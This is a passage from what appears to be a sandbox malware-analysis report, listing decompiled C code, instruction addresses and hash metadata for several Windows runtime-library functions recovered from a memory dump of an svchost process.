														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0302B150();
													}
													_t116 = E030C6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E030375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3118638; // 0x0
																	_t122 = L030338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E030376E2(_t154);
																			goto L41;
																		}
																	} else {
																		E030376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0305FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L030370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0305FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0305FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0305FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0305FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0305FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3117b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3117b84 = _t75;
						_t73 = E0303EB70(_t134, 0x3117b60);
						if( *0x3117b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0303FF60( *0x3117b20);
							}
						}
						goto L5;
					}
				}
			}

















































                        0x0305fab0
                        0x0305fab2
                        0x0305fab3
                        0x0305fab4
                        0x0305fabc
                        0x0305fac0
                        0x0305fb14
                        0x0305fb17
                        0x0305fac2
                        0x0305fac8
                        0x0305facd
                        0x0305fad3
                        0x0305fad3
                        0x0305fadd
                        0x0305fb18
                        0x0305fb1b
                        0x0305fb1d
                        0x0305fb1e
                        0x0305fb1f
                        0x0305fb20
                        0x0305fb21
                        0x0305fb22
                        0x0305fb23
                        0x0305fb24
                        0x0305fb25
                        0x0305fb26
                        0x0305fb27
                        0x0305fb28
                        0x0305fb29
                        0x0305fb2a
                        0x0305fb2b
                        0x0305fb2c
                        0x0305fb2d
                        0x0305fb2e
                        0x0305fb2f
                        0x0305fb3a
                        0x0305fb3b
                        0x0305fb3e
                        0x0305fb41
                        0x0305fb44
                        0x0305fb47
                        0x0305fb4a
                        0x0305fb4d
                        0x0305fb53
                        0x0309bdcb
                        0x0309bdcb
                        0x0305fb59
                        0x0305fb5b
                        0x0305fb5b
                        0x0305fb5e
                        0x0309bdd5
                        0x0309bdd8
                        0x00000000
                        0x0309bdda
                        0x00000000
                        0x0309bdda
                        0x0305fb64
                        0x0305fb64
                        0x0305fb64
                        0x0305fb67
                        0x0305fb6e
                        0x0305fb70
                        0x0305fb72
                        0x00000000
                        0x0305fb78
                        0x0305fb7a
                        0x0305fb7a
                        0x0305fb7d
                        0x0305fb80
                        0x0309bddf
                        0x0309bde1
                        0x00000000
                        0x0309bde3
                        0x00000000
                        0x0309bde3
                        0x0305fb86
                        0x0305fb86
                        0x0305fb86
                        0x0305fb8b
                        0x0305fb90
                        0x0305fb92
                        0x0305fb94
                        0x0305fb9a
                        0x0305fb9b
                        0x0305fba1
                        0x0309bde8
                        0x0309bdeb
                        0x0309bded
                        0x0309beb5
                        0x0309beb5
                        0x0309bebb
                        0x0309bebd
                        0x0309bec3
                        0x0309bed2
                        0x0309bedd
                        0x0309bedd
                        0x0309beed
                        0x00000000
                        0x0309bdf3
                        0x0309bdfe
                        0x0309be06
                        0x0309be0b
                        0x0309be0d
                        0x0309be0f
                        0x0309be14
                        0x0309be19
                        0x0309be20
                        0x0309be25
                        0x0309be27
                        0x0309be35
                        0x0309be39
                        0x0309be46
                        0x0309be4f
                        0x0309be54
                        0x0309be56
                        0x0309bef8
                        0x0309bef8
                        0x00000000
                        0x0309be5c
                        0x0309be5c
                        0x0309be60
                        0x00000000
                        0x0309be66
                        0x0309be66
                        0x0309be7f
                        0x0309be84
                        0x0309be87
                        0x0309be89
                        0x0309be8b
                        0x0309be99
                        0x0309be9d
                        0x0309bea0
                        0x0309beac
                        0x0309beaf
                        0x0309beb1
                        0x0309beb3
                        0x0309beb3
                        0x00000000
                        0x0309bea2
                        0x0309bea2
                        0x00000000
                        0x0309bea2
                        0x0309be8d
                        0x0309be8d
                        0x0309be92
                        0x00000000
                        0x0309be92
                        0x0309be8b
                        0x0309be60
                        0x0309be3b
                        0x0309be3b
                        0x0309be3e
                        0x00000000
                        0x0309be40
                        0x0309be40
                        0x0309be44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0309be44
                        0x0309be3e
                        0x0309be29
                        0x0309be29
                        0x00000000
                        0x0309be29
                        0x0309be27
                        0x00000000
                        0x0305fba7
                        0x0305fba7
                        0x0305fbab
                        0x0309bf02
                        0x0305fbb1
                        0x0305fbb1
                        0x0305fbb8
                        0x0305fbbd
                        0x0305fbbd
                        0x0305fbbf
                        0x0305fbbf
                        0x0305fbc5
                        0x0305fbcb
                        0x0305fbf8
                        0x0305fbf8
                        0x0305fbfa
                        0x00000000
                        0x0305fc00
                        0x0305fc00
                        0x0305fc03
                        0x00000000
                        0x0305fc09
                        0x0305fc09
                        0x0305fc0f
                        0x0305fc15
                        0x0305fc23
                        0x0305fc23
                        0x0305fc25
                        0x0305fc27
                        0x0305fc75
                        0x0305fc7c
                        0x0305fc84
                        0x00000000
                        0x0305fc29
                        0x0305fc29
                        0x0305fc2d
                        0x0305fc30
                        0x0309bf0f
                        0x00000000
                        0x0305fc36
                        0x0305fc38
                        0x0305fc3b
                        0x0305fc41
                        0x0309bf17
                        0x0309bf19
                        0x0309bf48
                        0x0309bf4b
                        0x00000000
                        0x0309bf1b
                        0x0309bf22
                        0x0309bf24
                        0x0309bf26
                        0x00000000
                        0x0309bf2c
                        0x0309bf37
                        0x0309bf39
                        0x0309bf3b
                        0x00000000
                        0x0309bf41
                        0x0309bf41
                        0x0309bf41
                        0x0309bf41
                        0x0309bf45
                        0x00000000
                        0x0309bf45
                        0x0309bf3b
                        0x0309bf26
                        0x00000000
                        0x0305fc47
                        0x0305fc47
                        0x0305fc49
                        0x0305fcb2
                        0x0305fcb4
                        0x0305fcb6
                        0x0305fcdc
                        0x0305fcdc
                        0x00000000
                        0x0305fcb8
                        0x0305fcc3
                        0x0305fcc5
                        0x0305fcc7
                        0x00000000
                        0x0305fcc9
                        0x0305fcc9
                        0x0305fccd
                        0x00000000
                        0x0305fccd
                        0x0305fcc7
                        0x00000000
                        0x0305fc4b
                        0x0305fc4b
                        0x0305fc4e
                        0x0305fc4e
                        0x0305fc51
                        0x0305fc51
                        0x0305fc54
                        0x0305fc5a
                        0x0305fc5c
                        0x0305fc5f
                        0x0305fc61
                        0x0305fc63
                        0x0305fc65
                        0x0305fc67
                        0x0305fc6e
                        0x0305fc72
                        0x0305fc72
                        0x0305fc72
                        0x0305fc72
                        0x0305fc67
                        0x0305fc61
                        0x00000000
                        0x0305fc5a
                        0x0305fc49
                        0x0305fc41
                        0x0305fc30
                        0x0305fc27
                        0x0305fc03
                        0x0305fbcd
                        0x0305fbd3
                        0x0305fbd9
                        0x0305fbdc
                        0x0305fbde
                        0x0305fc99
                        0x0305fc9b
                        0x0305fc9d
                        0x0305fcd5
                        0x0305fcd5
                        0x0305fc89
                        0x0305fc89
                        0x00000000
                        0x0305fc9f
                        0x0305fc9f
                        0x0305fca3
                        0x00000000
                        0x0305fca3
                        0x00000000
                        0x0305fbe4
                        0x0305fbe4
                        0x0305fbe4
                        0x0305fbe4
                        0x0305fbe9
                        0x0305fbf2
                        0x00000000
                        0x0305fbf2
                        0x0305fbde
                        0x0305fbcb
                        0x0305fbab
                        0x0305fc8b
                        0x0305fc8b
                        0x0305fc8c
                        0x0305fb80
                        0x0305fb72
                        0x0305fb5e
                        0x0305fc8d
                        0x0305fc91
                        0x0305fadf
                        0x0305fadf
                        0x0305fae1
                        0x0305fae4
                        0x0305fae7
                        0x0305faec
                        0x0305faf8
                        0x0305fb00
                        0x0305fb07
                        0x0305fb0f
                        0x0305fb0f
                        0x0305fb07
                        0x00000000
                        0x0305faf8
                        0x0305fadd

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0309BE0F
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: ee3a757cd6d2ebe9bae7fce8ffd2a07f2ce9ca6d03fed1e807fa8e064646def9
                        • Instruction ID: e637ab65275a7bfbfb8e4cc05d24b06e48337e7de1e46ed637827c5a5503f3bb
                        • Opcode Fuzzy Hash: ee3a757cd6d2ebe9bae7fce8ffd2a07f2ce9ca6d03fed1e807fa8e064646def9
                        • Instruction Fuzzy Hash: C8A1E375A03706CFEB65DB64C5507ABB7E9AF48720F08457AEC46DB680DB38D841CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03022D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                        Download Yara Rule
                        C-Code - Quality: 63%
                        			E03022D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3115350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3117bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E030697C0();
				}
				if( *0x31179c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x31179c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03051624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03047D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E030BFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03069520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0305E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0307DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3116901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3116901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03069980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E030695D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03047D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03047D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E030A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E030BFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3115350;
							if(_t109 != 0x3115350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E030BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E030B5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                        0x03022d8a
                        0x03022d8a
                        0x03022d92
                        0x03022d96
                        0x03022d9e
                        0x03022da0
                        0x03022da3
                        0x03022da5
                        0x03022da8
                        0x03022dab
                        0x03022db2
                        0x0307f9aa
                        0x0307f9ab
                        0x0307f9ae
                        0x0307f9ae
                        0x03022db8
                        0x03022dc2
                        0x0307f9b9
                        0x0307f9be
                        0x0307f9bf
                        0x0307f9bf
                        0x03022dcf
                        0x0307f9c9
                        0x03022dd5
                        0x03022dd5
                        0x03022dd5
                        0x03022dde
                        0x03022de1
                        0x03022e70
                        0x03022e72
                        0x03022e72
                        0x03022de7
                        0x03022deb
                        0x03022e7c
                        0x03022e83
                        0x03022e85
                        0x03022e8b
                        0x03022e8d
                        0x03022e92
                        0x03022e92
                        0x03022e85
                        0x03022df1
                        0x03022df7
                        0x03022df9
                        0x03022df9
                        0x03022dfc
                        0x03022dff
                        0x03022e02
                        0x00000000
                        0x03022e05
                        0x03022e0c
                        0x0307f9d9
                        0x03022e12
                        0x03022e12
                        0x03022e12
                        0x03022e1a
                        0x0307f9e3
                        0x0307f9e9
                        0x0307f9f0
                        0x0307f9f6
                        0x0307f9f8
                        0x0307f9f8
                        0x0307f9f0
                        0x03022e23
                        0x0307fa02
                        0x0307fa03
                        0x0307fa05
                        0x0307fa06
                        0x00000000
                        0x03022e29
                        0x03022e29
                        0x03022e2e
                        0x03022e34
                        0x03022e3e
                        0x00000000
                        0x00000000
                        0x03022e44
                        0x03022e47
                        0x03022e4d
                        0x00000000
                        0x00000000
                        0x03022e4f
                        0x03022e54
                        0x00000000
                        0x00000000
                        0x03022e5a
                        0x03022e5f
                        0x03022e9a
                        0x03022ea4
                        0x03022ea5
                        0x03022ea8
                        0x03022eaf
                        0x03022eb2
                        0x03022eb5
                        0x0307fae9
                        0x0307faeb
                        0x0307faed
                        0x0307faef
                        0x0307faf7
                        0x0307faf8
                        0x0307fafd
                        0x0307faff
                        0x0307fb04
                        0x0307fb04
                        0x0307faff
                        0x03022ec0
                        0x03022ec4
                        0x03022ec6
                        0x03022ec8
                        0x0307fb14
                        0x0307fb18
                        0x0307fb1e
                        0x0307fb21
                        0x0307fb21
                        0x03022ece
                        0x03022ece
                        0x03022ece
                        0x03022ed7
                        0x03022e61
                        0x03022e63
                        0x0307fa6b
                        0x0307fa71
                        0x0307fa76
                        0x0307fa78
                        0x0307fa8a
                        0x0307fa7a
                        0x0307fa83
                        0x0307fa83
                        0x0307fa8f
                        0x0307fa91
                        0x0307fa97
                        0x0307fa9d
                        0x0307faa4
                        0x0307faaa
                        0x0307faaf
                        0x0307fab1
                        0x0307fac3
                        0x0307fab3
                        0x0307fabc
                        0x0307fabc
                        0x0307fac8
                        0x0307facb
                        0x0307fadf
                        0x0307fadf
                        0x0307facb
                        0x0307faa4
                        0x0307fa91
                        0x03022e6f
                        0x03022e6f
                        0x03022e5f
                        0x0307fa13
                        0x0307fa15
                        0x0307fa17
                        0x0307fa1f
                        0x0307fa21
                        0x0307fa22
                        0x0307fa25
                        0x0307fa28
                        0x0307fa2f
                        0x0307fa2f
                        0x0307fa2a
                        0x0307fa2a
                        0x0307fa2a
                        0x0307fa31
                        0x0307fa34
                        0x0307fa36
                        0x0307fa3c
                        0x0307fa3e
                        0x0307fa41
                        0x0307fa43
                        0x0307fa45
                        0x0307fa45
                        0x0307fa41
                        0x0307fa3c
                        0x0307fa4a
                        0x0307fa4f
                        0x0307fa51
                        0x0307fa53
                        0x0307fa56
                        0x0307fa5b
                        0x0307fa5e
                        0x00000000
                        0x0307fa5e
                        0x03022e23

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: e761c7d2b26003495cfbe3e195fa3d3d26763ebea4bfaac8f47df699628fc8b2
                        • Instruction ID: a365cf3bc3a1ee87d013b32e18ffb6dccb8b680a2133e19609d87fdbf6302de2
                        • Opcode Fuzzy Hash: e761c7d2b26003495cfbe3e195fa3d3d26763ebea4bfaac8f47df699628fc8b2
                        • Instruction Fuzzy Hash: 8A613771E03655AFDB71DFA8C840BBEBBF9EB88710F180AA9D8119B2C0C7349940C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E030F0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E030EFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E030F1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03069730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E030EA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E030EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3118b04 >> 0x14) + (_v44 -  *0x3118b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03047D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E030E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03047D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E030DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3118724 & 0x00000008) != 0) {
						E030E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E030F15B5(0x3118ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                        0x030f0eb7
                        0x030f0eb9
                        0x030f0ec0
                        0x030f0ec2
                        0x030f0ecd
                        0x030f105b
                        0x030f105b
                        0x030f1061
                        0x030f1066
                        0x030f1066
                        0x030f106b
                        0x030f1073
                        0x030f1073
                        0x030f0ed3
                        0x030f0ed6
                        0x030f0edc
                        0x030f0ee0
                        0x030f0ee7
                        0x030f0ef0
                        0x030f0ef5
                        0x030f0efa
                        0x030f0efc
                        0x030f0efd
                        0x030f0f03
                        0x030f0f04
                        0x030f0f06
                        0x030f0f07
                        0x030f0f09
                        0x030f0f0e
                        0x030f0f14
                        0x030f0f23
                        0x030f0f2d
                        0x030f0f34
                        0x030f0f34
                        0x030f0f14
                        0x030f0f52
                        0x00000000
                        0x00000000
                        0x030f0f58
                        0x030f0f73
                        0x030f0f74
                        0x030f0f79
                        0x030f0f7d
                        0x030f0f80
                        0x030f0f86
                        0x030f0fab
                        0x030f0fb5
                        0x030f0fc6
                        0x030f0fd1
                        0x030f0fe3
                        0x030f0fd3
                        0x030f0fdc
                        0x030f0fdc
                        0x030f0feb
                        0x030f1009
                        0x030f1009
                        0x030f1015
                        0x030f1027
                        0x030f1017
                        0x030f1020
                        0x030f1020
                        0x030f102f
                        0x030f103c
                        0x030f103c
                        0x030f1048
                        0x030f1050
                        0x030f1050
                        0x030f1055
                        0x00000000
                        0x030f1055
                        0x030f0f88
                        0x030f0f9e
                        0x030f0fa2
                        0x030f0fa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030f0fa9
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 6ad4648bbd76fb0bc1f59150d9d2654adfba1c002ab94b1d8ec1844b70fc2cbd
                        • Instruction ID: b1eb2d9c6df34a0ea250134466686fd3caad37650b0226438aa91c20753136c3
                        • Opcode Fuzzy Hash: 6ad4648bbd76fb0bc1f59150d9d2654adfba1c002ab94b1d8ec1844b70fc2cbd
                        • Instruction Fuzzy Hash: A351C0713053419FD328DF29D984B5BB7E5EBC8704F08092CFA969BA91D771E809CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                        Download Yara Rule
